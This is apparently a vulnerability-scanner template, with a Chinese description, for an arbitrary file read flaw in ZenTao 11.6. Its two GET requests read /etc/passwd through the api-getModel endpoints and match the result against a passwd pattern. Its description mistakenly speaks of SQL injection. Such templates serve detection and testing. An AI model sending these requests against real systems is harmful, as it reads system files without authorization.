漏洞描述
禅道 11.6 版本中对用户接口调用权限过滤不完善,导致调用接口执行SQL语句导致SQL注入 icon_hash="53755730"
id: zentao-api-getmodel-api-getmethod-filepath-fileread
info:
name: 禅道 11.6 Api getModel api getMethod filePath 任意文件读取漏洞
author: daffainfo
severity: critical
description: 禅道 11.6 版本中对用户接口调用权限过滤不完善,导致调用接口执行SQL语句导致SQL注入 icon_hash="53755730"
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/%E7%A6%85%E9%81%93%2011.6%20api-getModel-api-getMethod-filePath%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
rules:
Linux0:
request:
method: GET
path: /api-getModel-file-parseCSV-fileName=/etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
Linux1:
request:
method: GET
path: /api-getModel-api-getMethod-filePath=/etc/passwd/1
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: Linux0() || Linux1()